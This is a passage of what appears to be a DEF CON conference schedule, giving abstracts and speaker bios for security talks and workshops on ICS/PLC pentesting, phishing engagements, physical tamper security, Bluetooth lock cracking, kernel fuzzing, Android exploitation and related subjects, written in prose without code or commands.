In this workshop, you will learn the specifics of performing a penetration test on industrial control systems, and especially on Programmable Logic Controllers (PLCs). We will cover the main components and the commonly associated security flaws of industrial control systems, aka SCADA systems. We will discover how they work, how they communicate with the SCADA systems, to learn the methods and tools you can use to p*wn them.
Then we will move on to real-world by attacking real PLCs from two major manufacturers on a dedicated setup featuring a robot arm and a model train !
Arnaud Soullié is a senior consultant at Solucom, where he performed 120+ security audits and pentests. He has a specific interest in Active Directory security as well as ICS, two subjects that tend to collide nowadays. He teaches ICS security and pentests workshops at security conferences (BlackHat Europe 2014, BSides Las Vegas 2015, Brucon 2015) as well as full trainings (Hack In Paris 2015).
Max Class Size: 20
Prerequisites for students: A knowledge of penetration testing is a plus, but I try to make it work for newbies as well.
Materials or Equipment students will need to bring to participate: Each student should come with a laptop capable of running VMs and WiFi. 4gb of RAM recommended, as well as 50Gb disk space.
Return to Index
DEFCON - DEF CON 101 - Saturday - 15:00-15:59
Phishing without Failure and Frustration
Jay Beale CTO InGuardians Inc.
Larry Pesce Director of Research, InGuardians
You want to phish your company or your client. You’ve never done this for work before, you’ve got a week to do it, and you figure that’s plenty of time. Then someone objects to the pretext at the last minute. Or spam filters block everything. Or you decide to send slowly, to avoid detection, but the third recipient alerts the entire company. Or you can only find 5 target addresses. We’ve all been there on our first professional phishing exercise. What should be as easy as building a two page web site and writing a clever e-mail turns into a massively frustrating exercise with a centi-scaled corpus of captured credentials. In this talk, we’ll tell you how to win at phishing, from start to finish, particularly in hacking Layer 8, the "Politics" layer of the OSI stack that’s part of any professional phishing engagement. We’ll share stories of many of our experiences, which recently included an investigation opened with the US Security and Exchange Commission (SEC). Finally, we’ll tell you how we stopped feeling frustrated, learned to handle the politics, and produced successful phishing campaigns that hardened organizations at the human layer, and started to screw things up for the bad actors.
Jay Beale has created several security tools, including Bastille Linux/UNIX and the CIS Linux Scoring Tool, both of which have been used throughout industry and government. He has served as an invited speaker, program chair and trainer at many industry and government conferences, a columnist for Information Security Magazine, SecurityPortal and SecurityFocus, and a contributor to nine books, including those in his Open Source Security Series and the ‘Stealing the Network’ series. Jay is a founder and the CTO of the information security consulting company InGuardians, where way too many clients’ staff have enthusiastically given him their passwords.
Twitter: @jaybeale
Jay Beale on Facebook
Larry Pesce, the Director of Research at InGuardians, has a long history
with hacking that began with the family TV when he was a kid, rebuilding it
after it caught on fire. Both times. Later, as a web developer for a
university in the early days of the Internet, he managed some of the
first layer 3-switched networks in the world. Larry holds a handful of
SANS certs, wrote a book or two and co-founded the multiple
international award-winning security podcast, "Paul's Security Weekly".
When not pursuing these activities, work-related passions have also
involved leveraging OSINT for attack surface development.
Outside of work, Larry enjoys long walks on the beach weighed down
by his ham radio (DE KB1TNF) and thinking of ways to survive the
pending zombie apocalypse.
Return to Index
Workshops - Las Vegas Ballroom 7 - Saturday - 14:00-18:00
Physical Security for Computing Systems, a Look at Design, Attacks and Defenses - Steve Weingart
Physical Security for Computing Systems, a Look at Design, Attacks and Defenses
Steve Weingart Security Researcher
Physical security for computing systems is a topic that usually gets left to FIPS 140 and tamper labels, but it is a much broader and more interesting subject. As the value of data on computing systems increases and operating systems become more secure, physical attacks on computing systems to steal or modify assets become more likely. At the low end are locks and tamper labels, at the high end are complex mechanisms to detect and respond to tampering and intrusion from the box level all the way down to the chip level. All of this technology requires constant review and improvement, just as other competitive technologies need review to stay at the leading edge. The bar is ever rising.
Physical security is an interdisciplinary field. The materials and chemistry are as important as the electronics, circuits and physics. A tamper label can be defeated by application of the right solvent. A cover switch can be defeated by piping super glue in through an air vent or a slightly bent cover. Hard epoxies can be removed with drain cleaner and a tamper detection circuit can be defeated by setting the supply voltage to a critical value or a microprocessor's start up tests bypassed by manipulating the width of the reset pulse.
This training session will show many of the known attack and defense methods from the basic to the exotic. It will include easy and low tech ways of performing high tech attacks, as well as descriptions of the highest tech methods.
Design examples will be shown with examples of the tools, devices, circuits and materials used to implement both attack and defense systems. Demonstrations will be included.
Steve Weingart has been active in the Security Standards and Physical Security communities since the 1980's. He was on the NIST panel that wrote FIPS 140-1 and has been a continuing contributor to both FIPS 140 and Common Criteria development. At the IBM Thomas J. Watson Research Center, he was the lead engineer for the IBM 4758 secure coprocessor which was the first cryptographic module validated at Security Level 4 under FIPS 140-1. He has continued to work in the security field as a developer of secure cryptographic modules, a consultant, a standards test lab engineer and as a standards test lab manager. Steve now coordinates security standard certifications for Aruba and continues to consult, contribute to the standards community and trains others in security standards and physical security.
Max Class Size: 55
Prerequisites for students: Some knowledge of analog and digital electronic circuits would be very helpful. Knowledge of materials and some chemistry is handy too.
Materials or Equipment students will need to bring to participate: None, I will supply any needed.
Return to Index
DEFCON - Track Three - Saturday - 11:00-11:59
Picking Bluetooth Low Energy Locks from a Quarter Mile Away
Anthony Rose Hacker
Ben Ramsey,
Hacker
Many Bluetooth Low Energy (BLE) enabled deadbolts and padlocks have hit the market recently. These devices promise convenience and security through smartphone control. We investigated sixteen of these products from multiple vendors and discovered wireless vulnerabilities in most of them. Using a $50 antenna, we successfully picked vulnerable locks from over 400 meters away. In this presentation we introduce open source tools to crack each of the vulnerable BLE locks. Furthermore, after surveying the open source Bluetooth hacking tools currently available, we find very little support for BLE. So, to make discovering and range finding to BLE devices easier, we introduce a new open source war-walking tool compatible with both Bluetooth Classic and BLE.
Anthony Rose is an electrical engineer with five years of network security experience. His prior work includes traffic and quality optimization for wireless video protocols. Currently he focuses on Bluetooth security and wireless penetration testing.
Ben Ramsey, PhD, CISSP, has over a decade of experience in network security research. His work focuses on critical infrastructure protection and low power wireless protocols, such as ZigBee, Z-Wave, and Bluetooth Low Energy. He has published in several academic journals and has presented research at multiple conferences, including GLOBECOM, MILCOM, SenseApp, and ShmooCon.
Return to Index
IOT - Bronze 4 - Friday - 14:00-14:50
Picking Bluetooth Low Energy Locks from a Quarter Mile Away
Anthony Rose
Many Bluetooth Low Energy (BLE) enabled deadbolts and padlocks have hit the market recently. These devices promise convenience and security through smartphone control. We investigated sixteen of these products from multiple vendors and discovered wireless vulnerabilities in most of them. Using a $50 antenna, we successfully picked vulnerable locks from over 400 meters away. In this presentation we introduce open source tools to crack each of the vulnerable BLE locks. Furthermore, after surveying the open source Bluetooth hacking tools currently available, we find very little support for BLE. So, to make discovering and range finding to BLE devices easier, we introduce a new open source warwalking tool compatible with both Bluetooth Classic and BLE.
These locks are being relied upon by consumers to protect their homes and property and they need to be fully aware of the risks. By revealing the security vulnerabilities in BTLE locks from multiple vendors and by releasing open source tools to crack them wirelessly, we hope to put pressure on companies to improve security in future products. Plus, we will perform live demos of two of our tools.
Anthony Rose is an electrical engineer with five years of network security experience. His prior work includes traffic and quality optimization for wireless video protocols. Currently he focuses on Bluetooth security and wireless penetration testing.
Ben Ramsey, PhD, CISSP, has over a decade of experience in network security research. His work focuses on critical infrastructure protection and low power wireless protocols, such as ZigBee, Z-Wave, and Bluetooth Low Energy. He has published in several academic journals and has presented research at multiple conferences, including GLOBECOM, MILCOM, SenseApp, and ShmooCon.
Return to Index
DEFCON - Track Two - Saturday - 12:30-12:59
pin2pwn: How to Root an Embedded Linux Box with a Sewing Needle
Brad Dixon, Hacker
Security assessments of embedded and IoT devices often begin with testing how an attacker could recover firmware from the device. When developers have done their job well you'll find JTAG locked-up, non-responsive serial ports, locked-down uboot, and perhaps even a home brewed secure-boot solution. In this session you'll learn details of a useful hardware/software penetration technique to attempt when you've run out of easier options. We've used this technique on two commercial device security assessments successfully and have refined the technique on a series of test devices in the lab. This session will cover the prerequisites for successful application of the technique and give you helpful hints to help your hack! Best of all this technique, while a bit risky to the hardware, is easy to try and doesn't require specialized equipment or hardware modification. We are going to take pieces of metal and stab them at the heart of the hardware and see what happens. For the hardware/firmware developer you'll get a checklist that you can use to reduce your vulnerability to this sort of attack.
Brad Dixon once told his parents that if they gave him a Commodore 64 it would be the last computer he'd ever want. He never got that Commodore 64. Nevertheless Brad managed to become a computer nerd at a young age. Brad studied Computer Engineering at Georgia Tech and jumped into embedded software engineering. He worked for many years helping developers to design embedded Linux into telecom, network, and mobile products. Brad also took a turn as a product manager for embedded development tools and a mobile location analytics product. At Carve Systems he hacks IoT, embedded, and Linux systems.
Return to Index
Demolabs - Table 3 - Saturday - 14:00-15:50
PKI for the People
Ze'ev Glozman
We are creating a public system that will monitor the public SSL infrastructure from user mobile or desktop endpoints and alert users to any intervention by a third party, be it state or non-state actor. We will be able to detect and categorize those changes as legitimate or illegitimate. This is an open source tool using a peer-to-peer network based on a mobile and desktop app. The tool will be available both as source code and as the actual application. This node net is used to audit and monitor changes in real-time to the global security infrastructure. This includes DNS records, IP addresses, domain names, certificate IDs, and public roots. The final product is an application able to tell a user, "Are you being mitm-ed right now?"
Ze'ev Glozman started working computers at a very young age in the Soviet Union. He was introduced to System V Unix at age 14. He used to work in healthcare technology, and his current focus is the public trust and public key infrastructure.
Return to Index
DEFCON - Track Three - Sunday - 15:00-15:59
Platform agnostic kernel fuzzing
James Loureiro Researcher, MWR InfoSecurity
Georgi Geshev Security Researcher, MWR InfoSecurity
A number of toolsets have been around for a while which propose methods for identifying vulnerabilities in kernels, in particular POSIX kernels. However, none of these identified a method for generic fuzzing across Windows and POSIX kernels and have not been updated for some time.
This presentation will outline the research which has occurred in order to find exploitable bugs across both Windows and POSIX kernels, focusing on fuzzing system calls and library calls in the Windows environment. System calls will be briefly explained, how they work and how these can be fuzzed in order to find bugs. The presentation will then move on to explaining core libraries in the Windows environment and how to fuzz these effectively.
Other issues with creating a kernel fuzzing environment will be discussed, such as effective logging of calls in which the machine could BSOD and kernel panic, and how to correctly reproduce vulnerabilities that have been identified by the fuzzer. We will also cover efficient scaling of a kernel fuzzer so that a number of virtual machines are in operation that can generate a large number of crashes.
Finally, a brief summary of the vulnerabilities that have been identified will be provided.
James Loureiro is a researcher at MWR InfoSecurity. During this time he has conducted research into a number of technologies, particularly ICS. Further, James has conducted research into Adobe Reader and other widely deployed platforms, which have identified vulnerabilities. These can be found on the MWR Labs website - labs.mwrinfosecurity.com. James has also presented previously at BSides London on this topic.
Georgi Geshev is a security researcher for MWR InfoSecurity in the UK. Born in the Eastern Bloc, a true wannabe Aussie now, he appreciates roo steaks and golden ales. His main areas of interest include bug hunting, reverse engineering and network protocols. It is a well known fact that Georgi only knows about MQ technology.
Twitter: @NerdKernel, @munmap, @mwrlabs
Return to Index
DEFCON - Track Two - Saturday - 15:00-15:59
Playing Through the Pain? - The Impact of Secrets and Dark Knowledge on Security and Intelligence Professionals
Richard Thieme ThiemeWorks
Dismissing or laughing off concerns about what it does to a person to know critical secrets does not lessen the impact when those secrets build a different map of reality than "normals" use and one has to calibrate narratives to what another believes. The cognitive dissonance that inevitably causes is managed by some with denial who live as if refusing to feel the pain makes it disappear. But as Philip K. Dick said, reality is that which, when you no longer believe in it, refuses to go away. And when cognitive dissonance evolves into symptoms of traumatic stress, one ignores those symptoms at one's peril. But the constraints of one's work often make it impossible to speak aloud about those symptoms, because that might threaten one's clearances, work, and career. The real cost of security work and professional intelligence goes beyond dollars. It is measured in family life, relationships, and mental and physical well-being.
The divorce rate is as high among intelligence professionals as it is among medical professionals, for good reason - how can relationships be based on openness and trust when one's primary commitments make truth-telling and disclosure impossible?
Richard Thieme has been around that space for years. He has listened to people in pain because of the compelling necessities of their work, the consequences of their actions, the misfiring of imperfect plans, and the burdens of - for example - listening to terrorists slit someone's throat in real time, then having to act as if they had a normal day at the office. Thieme touched on some of this impact in his story, "Northward into the Night," published in the Ranfurly Review, Big City Lit, Wanderings and Bewildering Stories before collection in "Mind Games." The story illuminates the emotional toll of managing multiple personas and ultimately forgetting who you are in the first place.
The bottom line is, trauma and secondary trauma have identifiable symptoms and they are everywhere in the "industry." The "hyper-real" space which the national security state creates by its very nature extends to normals, too, now, but it's more intense for professionals. Living as "social engineers," always trying to understand the other's POV so one can manipulate and exploit it, erodes the core self. The challenge is not abstract or philosophical, it's existential, fired into our faces every day at point blank range, and it constitutes an assault on authenticity and integrity. Sometimes sanity is at stake, too, and sometimes, life itself. In one week, two different people linked to the CIA told Thieme that going into that agency was like becoming a scientologist. Think about what that analogy means. For his own sake and sanity, Thieme has thought about it a lot and that's what this talk is about - the real facts of the matter and strategies for effective life-serving responses.
Richard Thieme is an author and professional speaker focused on the challenges posed by new technologies and the future, how to redesign ourselves to meet these challenges, and creativity in response to radical change. His column, ‘Islands in the Clickstream,’ was distributed to subscribers in sixty countries before collection as a book in 2004. When a friend at the National Security Agency said after they worked together on ethics and intelligence issues, ‘The only way you can tell the truth is through fiction,’ he returned to writing short stories, 19 of which are collected in "Mind Games."
His latest work is the stunning novel "FOAM," published by Exurban Press September 2015. He is also co-author of the critically extolled "UFOs and Government: A Historical Inquiry," a 5-year research project using material exclusively from government documents and other primary sources, now in 65 university libraries His work has been taught at universities in Europe, Australia, Canada, and the United States, and he has guest lectured at numerous universities, including Purdue University (CERIAS), the Technology, Literacy and Culture Distinguished Speakers Series of the University of Texas, the "Design Matters" lecture series at the University of Calgary, and as a Distinguished Lecturer in Telecommunications Systems at Murray State University.
He addressed the reinvention of "Europe" as a "cognitive artifact" for curators and artists at Museum Sztuki in Lodz, Poland, keynoted CONFidence in Krakow 2015, and keynoted "The Real Truth: A World’s Fair" at Raven Row Gallery, London, He recently keynoted Code Blue in Tokyo. He loved Tokyo. He has spoken for the National Security Agency, the FBI, the Secret Service, the US Department of the Treasury, and Los Alamos National Labs and has keynoted "hacker,"security, and technology conferences around the world. He keynoted the first two Black Hats and he is speaking at DEF CON for the 21st year.
Twitter: @neuralcowboy
Return to Index
Workshops - Las Vegas Ballroom 1 - Friday - 14:00-18:00
Practical Android Application Exploitation
Dinesh Shetty Lead of Mobile Security, Testing Center of Excellence at Security Innovation
Aditya Gupta Founder and Principal Consultant, Attify
Ever wonder how different attacking a Mobile application would be, from a traditional web application? Gone are the days when knowledge of just SQL Injection or XSS could help you land a lucrative high-paying infoSec job.
This will be an detailed course with extensive hands-on on exploiting Android applications. The training will be based on exploiting Android-InsecureBankv2 and other vulnerable applications that are written by the trainer in order to give an in-depth knowledge about the different kinds of vulnerabilities in an Android applications. This course will also discuss how an attacker can compromise a mobile application. After the workshop, the students will be able to successfully pentest and secure applications running on the various operating systems.
The training will also include a CTF challenge in the end where the attendees will use their skills learnt in the training to solve the CTF challenges.
Dinesh leads the Mobile Security Testing Center of Excellence at Security Innovation. He has performed innumerable penetration tests on Web, Mobile and VoIP technologies - however his core area of expertise is Mobile and Embedded application pentesting and exploitation. He is an accomplished author and speaker, and his research has been published in multiple security zines and sites like Packet Storm, Exploit-DB, PenTest Magazine, SecurityXploded, ClubHACK Magazine, and Exploit-Id amongst others. Dinesh is a Hall of Fame member of Apple, Adobe, and Barracuda Networks for his identification and responsible disclosure of critical security vulnerabilities in their products, web sites, and web services.
Aditya Gupta (@adi1391) is the founder and principal consultant of Attify ( attify.com ) , an IoT and Mobile security firm, and leading mobile security expert and evangelist. He has done a lot of in-depth research on Mobile application security and IoT device Exploitation. He is also the author of the popular Android security book "Learning Pentesting for Android Devices" selling over 10000+ copies, since the time of launch in March 2014. He is also a frequent speaker and trainer at numerous international security conferences including Black Hat, Syscan, OWASP AppSec, PhDays, Brucon, Toorcon, Clubhack etc, and also provides private training for organisations for developers and red teams all over the world.
Max Class Size: 55
Prerequisites for students: None
Materials or Equipment students will need to bring to participate:
- Laptop with Genymotion installed.
- 20+ GB free hard disk space
- 3+ GB RAM
- Android Studio installed on the machine.
Return to Index
SkyTalks - Skyview 3 - Saturday - 14:00-14:59
Speaker: James Edge
Talk: Practical Penetration Testing of Embedded Devices
This talk will go into the methodology of breaking into an embedded device during a penetration test or red team engagement. This talk is about real world testing where you dont have physical access to a device and it is a fixed length engagement were the client expects a deliverable.
The vulnerabilities, issues, and methods discussed were found and conducted during penetration tests and not researched in a lab.
Return to Index
CPV - Bronze 2 - Friday - 12:00-13:00
Talk Title:
Practical Text-Based Steganography: Exfiltrating Data from Secure Networks and Socially Engineering SecOps Analysts [WORKSHOP]
Speaker Name, Employer or position:
Joe Gervais (TryCatchHCF) - Principal InfoSec Engineer / Lead Pentester at Lifelock
Abstract:
This workshop introduces real-world uses of text-based steganography to cloak your communications from the omnipresent web of machines and their human collaborators. Attendees will learn techniques to simply and repeatably bypass DLP controls and defeat data whitelisting enforced by Multi Level Security (MLS) devices. You will also learn methods for generating social engineering attacks against SecOps analysts and censors who may review your communications, plus techniques to counter frequency analysis attacks against your cloaked communications. All of this is accomplished using only simple Python scripts and text-based ciphers of your choosing. Attendees will then use the toolset to generate their own custom ciphers and social engineering attacks as we work through scenarios together.
Bio:
TryCatchHCF / Joe Gervais is the Principal InfoSec Engineer & Lead Pentester at LifeLock, and author of the Cloakify exfiltration toolset. He has 25+ years of security- and software engineering experience, mostly in US gov't/DoD sectors, and served as an Intelligence Analyst and Counterintelligence Specialist in the United States Marine Corps. Education includes a bachelors degree in Cognitive Science, and a masters degree in Information Assurance.
Social media links if provided:
https://github.com/TryCatchHCF
Return to Index
Workshops - Las Vegas Ballroom 6 - Friday - 14:00-18:00
Pragmatic Cloud Security: Hands-On Turbocharged Edition
Rich Mogull (Crash) Analyst & CEO, Securosis
This workshop takes the very best of our Black Hat cloud security defensive training classes and crams them into a high-speed, 4-hour DEF CON session. If you work in cloud, or are just cloud-curious, we’ll get you up to speed on the latest and greatest practical techniques for securing Amazon Web Services. We are cutting out all the theory to focus exclusively on the technical implementation.
Before coming to the session you should know what AWS is and be able to launch and connect to an instance (we’ll provide instructions ahead of time just to be safe). You should also be comfortable with a Linux command line and basic scripting. That’s all you need walking in, but by the time you leave we will have shown you:
- How to build complex AWS virtual networks with cross-account and VPC connectivity.
- How to leverage auto scale groups for building immutable infrastructure. What’s that? Servers that are impossible to log into and replaced every few hours with 0 downtime.
- Techniques for advanced IAM policies in AWS. For example, using tags or other conditionals for dynamic, fine-grained access.
- Building server less infrastructure for automating security. You can, and we sh*t you not, create actual self-healing infrastructure in AWS without any running servers.
- Automation techniques to play with the AWS APIs like a boss. Sure, we’ll focus on the defensive side, but let’s just say you offensive types might pick up a thing or two.
- How to build an automated deployment pipeline using Git, Jenkins, Packer, and Ansible to push new images to AWS. (We’ll use a scripted build for time, but you’ll see how it all pieces together).
- If we have time, we’ll show you how t use Amazon’s Key Management Service to encrypt… everything. Plus cover how to make things subpoena proof, if you are into that sort of thing.
The focus of the workshop is on defense, and how to best use the tools in AWS for security. We can’t cover anything in four hours, so we will focus on the technical techniques you can use to most-quickly build up your skills.
Rich has twenty years experience in information security, physical security, and risk management. He specializes in cloud security, data security, application security, emerging security technologies, and security management. He is also the principle course designer of the Cloud Security Alliance training class and actively works on developing hands-on cloud security techniques. Prior to founding Securosis, Rich was a Research Vice President at Gartner on the security team. Prior to his seven years at Gartner, Rich worked as an independent consultant, web application developer, software development manager at the University of Colorado, and systems and network administrator.
Rich is the Security Editor of TidBITS and a frequent contributor to publications ranging from Information Security Magazine to Macworld. He is a frequent industry speaker at events including the RSA Security Conference, Black Hat, and DEF CON, and has spoken on every continent except Antarctica (where he's happy to speak for free -- assuming travel is covered).
Max Class Size: 55
Prerequisites for students: Comfortable with some flavor of Linux and command lines. Ideally basic scripting skills in bash/python/and/or/ruby
Materials or Equipment students will need to bring to participate: Laptop or tablet that can connect to Amazon Web Services. An AWS account (labs will be mostly on the free tier, so total costs will be less than a beer). Ability to make SSH connections to arbitrary AWS instances. Instructions for setting up your account will be made available before the workshop.
Return to Index
WOS - Skyview 6 - Friday - 11:10-11:59
Presenting Security Metrics to the Board / Leadership
Walt Williams
The board of directors and corporate leadership is not interested in how many attacks your firewall has blocked, and frankly, that is not a metric, that is a measure. Difference between metrics and measurements, how metrics are constructed, and the kinds of metrics the board of directors are interested in will be discussed. In other words, how to identify how to align security metrics with business goals and objectives. The use of frameworks such as ISO 27004 to construct metrics, the pragmatic framework and its uses will also be discussed.
Walt Williams (Twitter: @LESecurity) CISSP, SSCP, CPT has served as an infrastructure and security architect at firms as diverse as GTE Internetworking, State Street Corp, Teradyne, The Commerce Group, and EMC. He has since moved to security management, where he now manages security at Lattice Engines. He is an outspoken proponent of design before build, an advocate of frameworks and standards, and has spoken at Security B-Sides on risk management as the cornerstone of a security architecture. He maintains a blog on security metrics and has presented to boards of three different organizations in diverse industries.
Return to Index
CPV - Bronze 2 - Friday - 17:30-18:00
Talk Title:
privacy by design - it's n0t that difficult
Speaker Name, Employer or position:
Petri Koivisto
Abstract:
Privacy by design is (still) hot topic at the moment. Why? Data privacy has become one of the customers basic assumptions and they are aware to demand evidence how you doing it. Privacy by design is not that difficult, if you have a bit of common sense and creativity. This presentation will give you a new way of thinking how to build privacy into whatever design you may have, through simple house example, layered approach thinking, humour and audience participation.
Bio:
Petri Koivisto is a different kind of privacy/security enabler aiming to be something with fancy title like DPO/CISO. My mission is to make you look awesome in privacy/infosec.
Social media links if provided:
@petriokoivisto
Return to Index
DEFCON - Track Two - Friday - 11:00-11:59
Project CITL
Mudge Zatko Director, CITL
Sarah Zatko CHief Scientist, CITL
Many industries, provide consumers with data about the quality, content, and cost of ownership of products, but the software industry leaves consumers with very little data to act upon. In fact when it comes to how secure or weak a product is from a security perspective, there is no meaningful consumer facing data. There has long been a call for the establishment of an independent organization to address this need. Last year, Mudge (from DARPA, Google, and L0pht fame) announced that after receiving a phone call from the White House he was leaving his senior position inside Google to create a non-profit organization to address this issue. This effort, known as CITL, is akin to Consumer Reports in its methodologies. While the media has dubbed it a "CyberUL", there is no focus on certifications or seals of approval, and no opaque evaluation metrics. Rather, like Consumer Reports, the goal is to evaluate software according to metrics and measurements that allow quantitative comparison and evaluation by anyone from a layperson, CFO, to security expert.
How? A wide range of heuristics that attackers use to identify which targets are hard or soft against new exploitation has been codified, refined, and enhanced. Some of these techniques are quite straightforward and even broadly known, while others are esoteric tradecraft. To date, no one has applied all of these metrics uniformly across an entire software ecosystem before and shared the results.
For the first time, a peek at the Cyber Independent Testing Lab’s metrics, methodologies, and preliminary results from assessing the software quality and inherent vulnerability in over 100,000 binary applications on Windows, Linux, and OS X will be revealed. All accomplished with binaries only. Sometimes the more secure product is actually the cheaper, and quite often the security product is the most vulnerable.
There are plenty of surprises like these that are finally revealed through quantified measurements. With this information, organizations and consumers can finally make informed purchasing decisions when it comes the security of their products, and measurably realize more hardened environments. Insurance groups are already engaging CITL, as are organizations focused on consumer safety. Vendors will see how much better or worse their products are in comparison to their competitors. Even exploit developers have demonstrated that these results enable bug-bounty arbitrage. That recommendation you made to your family members last holiday about which web browser they should use to stay safe (or that large purchase you made for your industrial control systems)? Well, you can finally see if you chose a hard or soft target… with the data to back it up.
Mudge Zatko is the Director of CITL. He has contributed significantly to disclosure and education on information and security vulnerabilities. In addition to pioneering buffer overflow work, the security work he has released contained early examples of flaws in the following areas: code injection, race conditions, side-channel attacks, exploitation of embedded systems, and cryptanalysis of commercial systems. He was the original author of the password cracking software L0phtCrack, Anti-Sniff, and L0phtWatch. In 2010 Mudge accepted a position as a program manager at DARPA where he oversaw cyber security R&D, and re-built the Agency’s approach to cyber security research. In 2013 Mudge went to work for Google where he was the Deputy Director of their Advanced Technology & Projects division. Most recently, after conversations with the White House, Mudge stood up the non-profit Cyber Independent Testing Laboratory inspired by efforts such as Consumer’s Union. He is the recipient of the Secretary of Defense Exceptional Civilian Service Award medal, an honorary Plank Owner of the US Navy Destroyer DDG-85, was inducted into the Order of Thor, the US Army’s Association of Cyber Military Professionals, recognized as a vital contributor to the creation of the US Cyber Corps (SfS PDD-63), and has received other commendations from the CIA and from the Executive Office of the President of the United States
Sarah Zatko s the Chief Scientist at CITL, a partner at L0pht Holdings, LLC, and a member of the US Army’s Order of Thor. She has presented her research on the integration of security into CS curriculum at Shmoocon and Hope. That work is also published in IEEE Security & Privacy. She holds a degree in mathematics from MIT and a Master's in computer science from Boston University.
Return to Index
DEFCON - DEF CON 101 - Saturday - 17:30-17:59
Propaganda and You (and your devices) - How media devices can be used to coerce, and how the same devices can be used to fight back.
The Bob Ross Fan Club Security Software Engineer
Any novice in the security field can tell you the importance of sanitizing input that is being read into computer systems. But what steps do most of us take in sanitizing the input that is read into the computer systems known as our brains? This presentation will go over the attack vector that is known as Propaganda. By studying works such as Manufacturing Consent (by Noam Chomsky and Ed Herman) we can learn of the various manipulations that happen to media before it reaches the end reader.
Armed with the knowledge of how propaganda works, a person could attempt a more healthy diet of media consumption. Computer and data networks are heavily utilized by those wishing to push agendas, but who is to say these same technologies can not be utilized to fight back? Developers have access to all sorts of tools that help accomplish this feat, such as web scrapers, natural language tool kits, or even the reddit source code repository. This talk will walk the audience through some different techniques that can be used for better media consumption.
The Bob Ross Fan Club is currently working as a security software engineer for embedded linux systems. Has previously been apart of published research efforts on the topics of user privacy and the threats posed by the tracking practices employed by internet companies.
Twitter: @bobross_fc
Return to Index
BHV - Skyview 4 - Friday - 11:00-11:59
Speaker: Amanda Plimpton/Evan Anderson
Amanda Plimpton/Evan Anderson:
Collaborators Amanda Plimpton and Evan Anderson are active in the body augmenting community and excited to see the current growth in the citizen science. Small groups and individuals who chose to pursue lines of inquiry and conduct ethical, methodical experiments are the key to the next series of breakthroughs that we will see across many sectors. Citizen scientists are people driven to investigate, experiment and seek answers. Whether they channel their passionate interests into a start-up business or stay in the nonprofit sector, they will continue to make important contributions in their fields. Our goal as speakers here is more modest, we are bringing forward research as a starting point for ourselves and our audience. Human experimentation has a long (and dark) history and today is fraught with ethical dilemmas and tensions. By looking at it through the lens of military experiments with a focus on psychoactive drugs we hope to add a small amount of research to the open source science body of work and to highlight the need for sound, ethically sourced data. Hopefully we will provoke thoughtful discussions around modern human experiments.
Abstract:
By looking at key experiments and trials done by the military we can learn about psychoactive chemicals and protocols that work, and don’t work, on humans. From biological enhancement to chemical deterrents, there is a wealth of information that grassroot scientists and body augmenters can use for their research and experiments.
Return to Index
BHV - Skyview 4 - Friday - 11:00-11:59
Speaker: Amanda Plimpton/Evan Anderson
Amanda Plimpton/Evan Anderson:
Collaborators Amanda Plimpton and Evan Anderson are active in the body augmenting community and excited to see the current growth in the citizen science. Small groups and individuals who chose to pursue lines of inquiry and conduct ethical, methodical experiments are the key to the next series of breakthroughs that we will see across many sectors. Citizen scientists are people driven to investigate, experiment and seek answers. Whether they channel their passionate interests into a start-up business or stay in the nonprofit sector, they will continue to make important contributions in their fields. Our goal as speakers here is more modest, we are bringing forward research as a starting point for ourselves and our audience. Human experimentation has a long (and dark) history and today is fraught with ethical dilemmas and tensions. By looking at it through the lens of military experiments with a focus on psychoactive drugs we hope to add a small amount of research to the open source science body of work and to highlight the need for sound, ethically sourced data. Hopefully we will provoke thoughtful discussions around modern human experiments.
Abstract:
By looking at key experiments and trials done by the military we can learn about psychoactive chemicals and protocols that work, and don’t work, on humans. From biological enhancement to chemical deterrents, there is a wealth of information that grassroot scientists and body augmenters can use for their research and experiments.
Return to Index
Ballys - Blu Pool - Friday - 20:00-03:00
Open to all LGBT and our friends. Queercon Pool Party
@Blu Pool, Bally's 20:00-03:00
The annual tradition continues! Queercon takes over the Blu Pool at Bally's Friday Night for our most epic pool party yet. There is no better party to be at. Queercon's legacy began at the pool so we go back to our roots to celebrate diversity in one of the best DEFCON parties. We welcome anyone from the LGBT, as well as our friends and allies. This party is no drama and no attitude. Just come as you are.
The pool will be open, the music will be playing and the bar will be serving. Dont forget your swimwear. Come party for our epic Pool Party that you wont forget.
DJ Lineup to be announced.
Thank you to our Official Pool Party Sponsor:
HackerOne
ABSOLUTELY NO OUTSIDE DRINKS ALLOWED! Saturday, August 6th
Return to Index
Workshops - Las Vegas Ballroom 4 - Thursday - 10:00-14:00
Raspberry Pi and Kali Deluxe Spy workshop
Dallas Security Researcher
Sean Satterlee (ohm)
EventBrite Link: Required for Tickets and/or buying kits:
https://www.eventbrite.com/e/defcon-workshops-2016-hacking-with-raspberry-pi-and-kali-tickets-26124104901
Back by popular demand. This year will be a tight 4 hour run through of lots of great information. There will be 2 classes (both the same) of 4 hours each – so pick the best one for you. This class is appropriate for ages 15 and above who want to learn more about Raspberry Pi hardware and the Kali security framework. Kali is a combination of operating system and hacker security tools used for security testing (spying as well). If you choose the kit, you will leave with an excellent starting point for hardware, robotics, spying, and security fun. Space is limited, so sign up quickly.
Cutoff is July 15-ish for kits. We will also be inviting guest speakers / hardware village / vendors (if available) to drop by and say hello during class who are key to the Raspberry Pi / Maker movement and Kali / Metasploit frameworks. You never know what new release or feature might show up. A Laptop is required. See sign-up information below for more information of pre-installed tools needed. We will also email this out to registered guests as well.
In four hours we will cover the Raspberry Pi including:
- History / hardware in kit
- Installing the OS
- Python Programming (Intro, Hello World, Hardware Interfacing options)
- Controlling LED’s (Light up LED, Loops, timer)
- Controlling Multi Color Led Strips (1000’s of colors) – Different type of LED
- Distance and Motion Sensors (detecting motion / Distance) – Interface a sensor
- Sensors (Advanced)
- Controlling Relays (Controlling real world objects, motors, lights)
- Interfacing to the outside world
- Updating components of the OS
- Introduction to Kali (Pen testing platform)
- Updating Kali OS / Components
- Kali command set tools on the Rpi
- Using tools to spy on your target
- Modules to install on Kali (discussion of Metasploit)
- Networking (Discovery / Setup)
- Wireless Networking
- Social Media Spying
- Sniffing Wi-fi and setting up multiple adapters
- Penetration testing overview and discussion
- Uses for Physical Security
- Discussion of the Role of Rpi and Kali / Security
- Discussion and kits provided for Kali also on your PC (Distro)
- Optional (camera and vision)
We will have options for people who want to bring their own or just buy a kit. Keep in mind, if you bring your own and dont bring everything - it may not work. We wont have time to work around your specific configuration. This workshop is free, however you need a ticket and a defcon badge to attend. The kits are not free. If something goes wrong and the conference is cancelled, then you will get the kit and documentation. If something bad happens during the workshop (lose power, kicked out, no wifi, whatever) - sorry, its free (the workshop), but you will still have the kit if you bought that type of kit.
